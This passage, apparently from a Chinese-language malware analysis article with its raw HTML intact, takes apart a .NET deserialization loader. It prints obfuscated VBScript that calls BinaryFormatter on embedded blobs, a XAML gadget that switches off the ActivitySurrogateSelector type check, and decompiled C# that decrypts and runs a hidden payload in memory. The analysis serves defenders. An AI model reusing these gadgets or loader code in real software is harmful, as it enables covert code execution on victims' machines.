0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">MediumChurn</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;5753&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;637269&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    MediumChurn = MediumChurn &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;70742e5368&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;656c6c&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">Set</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">BottomMaturity</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> CreateObject(MediumChurn)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    MediumChurn = IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;5072&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;6f63657373&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">Set</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">IndexLien</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> BottomMaturity.environment(MediumChurn)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    ...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    DefineFederal = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;AAEAAAD/////AQAAAAAAA...&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    SetAutomated = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;AAEAAAD/////AQAAAAAAAAAMAgAAA&#34;</span></span><span leaf=""> &amp; </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;FdTeXN0ZW0uV2luZG93cy5Gb3Jtcywg...&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        Dim </span><span style="color: rgb(0, 72, 171);"><span leaf="">SetInstallment</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">MediumChurn</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;53797374656d2e52756e74696d652e53657269616c697a6174696f6e2e466f726d6174746572732e4269&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;6e6172792e42696e617279466f726d6174746572&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">Set</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">SetInstallment</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> LeftTax.CreateObject(MediumChurn)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    SetInstallment.Deserialize_2(PrintOperation(LeftTax, DefineFederal, </span><span style="color: rgb(76, 129, 201);"><span leaf="">2225</span></span><span leaf="">))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    If Err.Number &lt;&gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf=""> Then</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      SetInstallment.Deserialize_2(PrintOperation(LeftTax, SetAutomated, </span><span style="color: rgb(76, 129, 201);"><span leaf="">175689</span></span><span leaf="">))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    End If</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">End Sub</span></p></code></pre></p><p data-line="106" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">第一段.net反序列化将：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">System.Workflow.ComponentModel.AppSettings.disableActivitySurrogateSelectorTypeCheck</span></code><span leaf=""> 改成 true，AppSettings 同名键设为 true。用于关闭ActivitySurrogateSelector类型检查安全，为第二段恶意代码做准备。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ResourceDictionary</span></span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">xmlns</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="http://schemas.microsoft.com/winfx/2006/xaml/presentation" target="_blank">http://schemas.microsoft.com/winfx/2006/xaml/presentation</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">xmlns:x</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="http://schemas.microsoft.com/winfx/2006/xaml" target="_blank">http://schemas.microsoft.com/winfx/2006/xaml</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">xmlns:s</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;clr-namespace:System;assembly=mscorlib&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">xmlns:c</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;clr-namespace:System.Configuration;assembly=System.Configuration&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">xmlns:r</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;clr-namespace:System.Reflection;assembly=mscorlib&#34;</span></span><span leaf="">&gt;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">x:Key</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;type&#34;</span></span><span leaf="">ObjectType</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;{x:Type s:Type}&#34;</span></span><span leaf="">MethodName</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;GetType&#34;</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span><span leaf="">System.Workflow.ComponentModel.AppSettings, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">x:Key</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;field&#34;</span></span><span leaf="">ObjectInstance</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;{StaticResource type}&#34;</span></span><span leaf="">MethodName</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;GetField&#34;</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span><span leaf="">disableActivitySurrogateSelectorTypeCheck</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">r:BindingFlags</span></span><span leaf="">&gt;</span></span><span leaf="">40</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">r:BindingFlags</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">x:Key</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;set&#34;</span></span><span leaf="">ObjectInstance</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;{StaticResource field}&#34;</span></span><span leaf="">MethodName</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;SetValue&#34;</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:Object</span></span><span leaf="">/&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:Boolean</span></span><span leaf="">&gt;</span></span><span leaf="">true</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:Boolean</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">x:Key</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;setMethod&#34;</span></span><span leaf="">ObjectInstance</span><span leaf="">=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;{x:Static c:ConfigurationManager.AppSettings}&#34;</span></span><span leaf="">MethodName</span><span leaf=""> =</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Set&#34;</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span><span leaf="">microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span><span leaf="">true</span><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">s:String</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider.MethodParameters</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ObjectDataProvider</span></span><span leaf="">&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&lt;/</span><span style="color: rgb(0, 72, 171);"><span leaf="">ResourceDictionary</span></span><span leaf="">&gt;</span></span></p></code></pre></p><p data-line="142" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">第二段反序列化代码，经过反序列化流程最终反射装载代码中隐藏的一个.Net恶意程序集。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">【精简代码流程】</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">AxHost+State </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ ActivitySurrogateSelector </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ UnitySerializationHolder </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ Assembly</span><span style="color: rgb(0, 72, 171);"><span leaf="">.Load</span></span><span leaf="">(Byte</span><span leaf="">[]</span><span leaf="">) </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ EntryPoint </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ CreateInstance </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">→ 执行恶意PE</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">【关键代码】</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">入口类：</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">System</span><span style="color: rgb(0, 72, 171);"><span leaf="">.Windows</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">.Forms</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">.AxHost</span></span><span leaf="">+State</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">利用类：</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">System</span><span style="color: rgb(0, 72, 171);"><span leaf="">.Workflow</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">.ComponentModel</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">.Serialization</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">.ActivitySurrogateSelector</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">执行方法：</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Assembly</span><span style="color: rgb(0, 72, 171);"><span leaf="">.Load</span></span><span leaf="">(Byte</span><span leaf="">[]</span><span leaf="">) → EntryPoint → DeclaringType → CreateInstance(Type)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">恶意载荷：</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">嵌入的PE文件（MZ头开始）</span></p></code></pre></p><figure data-line="168" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5666666666666667" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027777" src="https://wechat2rss.xlab.app/img-proxy/?k=7bf1760b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVD9WCF9mT58G6Fx4jgjEjQDaiasaj0tVibelhDwC3mzFgXe38JM5uV41H00eEEHqzo0Rnn8vaZRwicgspa92FPApwdAYx3BJnZAY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="172" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">.Net程序集首先获取自身资源（x86，x64不同版本的payload），经Combine函数自定义解密+GZIP解压后申请内存将其修改可执行权限后执行，相关使用到的字符串也均通过Combine函数加密。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span style="color: rgb(0, 72, 171);"><span leaf="">public</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">unsafe</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">static</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">Cycle</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">string</span></span><span leaf="">[] Evolution</span><span leaf="">)</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">{</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[] array2;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">using</span></span><span leaf=""> (MemoryStream memoryStream = </span><span style="color: rgb(0, 72, 171);"><span leaf="">new</span></span><span leaf=""> MemoryStream())</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(Heaven.Site(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;þ+\u000e\0+&gt;&#34;</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">202</span></span><span leaf="">));</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        Stream manifestResourceStream2 = Assembly.GetExecutingAssembly().GetManifestResourceStream(Heaven.Site(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;\u0016Ô\u0003Õ\u0003æ&#34;</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">162</span></span><span leaf="">));</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        Stream stream = manifestResourceStream;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (manifestResourceStream != </span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf=""> &amp;&amp; manifestResourceStream2 != </span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            stream = ((IntPtr.Size == </span><span style="color: rgb(76, 129, 201);"><span leaf="">8</span></span><span leaf="">) ? manifestResourceStream : manifestResourceStream2);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (stream == </span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[] array = </span><span style="color: rgb(0, 72, 171);"><span leaf="">new</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">[</span><span style="color: rgb(76, 129, 201);"><span leaf="">512</span></span><span leaf="">];</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> i = stream.Read(array, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, array.Length); i &gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">; i = stream.Read(array, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, array.Length))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            memoryStream.Write(array, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, i);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        array2 = Family.Safety(Hill.Combine(memoryStream.ToArray(), Share.Defend));</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> result = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">try</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">fixed</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">byte</span></span><span leaf="">* ptr = &amp;array2[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">])</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf="">* </span><span style="color: rgb(0, 72, 171);"><span leaf="">value</span></span><span leaf=""> = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">void</span></span><span leaf="">*)ptr;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            Share.Typical typical;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (!Share.Hero((IntPtr)</span><span style="color: rgb(0, 72, 171);"><span leaf="">value</span></span><span leaf="">, (</span><span style="color: 